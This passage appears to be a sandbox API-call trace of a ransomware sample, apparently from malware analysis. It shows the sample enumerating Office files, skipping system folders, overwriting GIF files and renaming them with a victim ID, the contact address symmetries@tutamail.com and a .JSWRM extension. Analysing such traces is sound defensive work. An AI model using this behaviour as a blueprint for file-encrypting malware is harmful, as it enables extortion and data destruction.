hHeap=0x1e0000) returned 1 [0119.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.903] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2204, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR8F.GIF", cAlternateFileName="")) returned 1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2=".") returned 1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="..") returned 1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="...") returned 1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="windows") returned -1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="recovery") returned -1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="perflogs") returned -1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="documents and settings") returned 1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="system volume information") returned -1 [0119.903] lstrcmpiW (lpString1="PDIR8F.GIF", lpString2="msocache") returned 1 [0119.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR8F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0119.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR8F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR8F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0119.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0119.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.903] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0119.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.904] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8708) returned 1 [0119.904] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2200) returned 0x24e1d8 [0119.904] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2200, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2200, lpOverlapped=0x0) returned 1 [0119.974] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.974] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2200, lpOverlapped=0x0) returned 1 [0119.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.974] CloseHandle (hObject=0x314) returned 1 [0119.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0119.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0119.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.975] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR8F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir8f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0119.977] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x445d, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR9B.GIF", cAlternateFileName="")) returned 1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2=".") returned 1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="..") returned 1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="...") returned 1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="windows") returned -1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="recovery") returned -1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="perflogs") returned -1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="documents and settings") returned 1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="system volume information") returned -1 [0119.977] lstrcmpiW (lpString1="PDIR9B.GIF", lpString2="msocache") returned 1 [0119.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0119.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR9B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0119.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0119.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR9B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0119.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0119.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.978] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=17501) returned 1 [0119.978] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4450) returned 0x24e1d8 [0119.978] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4450, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4450, lpOverlapped=0x0) returned 1 [0119.981] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.981] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4450, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4450, lpOverlapped=0x0) returned 1 [0119.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.981] CloseHandle (hObject=0x314) returned 1 [0119.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0119.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0119.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0119.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.982] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0119.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.983] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5aec, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR9F.GIF", cAlternateFileName="")) returned 1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2=".") returned 1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="..") returned 1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="...") returned 1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="windows") returned -1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="recovery") returned -1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="perflogs") returned -1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="documents and settings") returned 1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="system volume information") returned -1 [0119.983] lstrcmpiW (lpString1="PDIR9F.GIF", lpString2="msocache") returned 1 [0119.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR9F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0119.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR9F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR9F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0119.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.984] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23276) returned 1 [0119.984] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ae0) returned 0x24e1d8 [0119.984] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x5ae0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x5ae0, lpOverlapped=0x0) returned 1 [0119.987] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.987] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x5ae0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x5ae0, lpOverlapped=0x0) returned 1 [0119.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.987] CloseHandle (hObject=0x314) returned 1 [0119.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0119.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0119.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0119.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0119.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0119.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR9F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir9f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0119.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.989] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x189e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPAPERS.INI", cAlternateFileName="")) returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2=".") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="..") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="...") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="windows") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="recovery") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="perflogs") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="documents and settings") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="$RECYCLE.BIN") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="system volume information") returned 1 [0119.989] lstrcmpiW (lpString1="ZPAPERS.INI", lpString2="msocache") returned 1 [0119.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPAPERS.INI", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 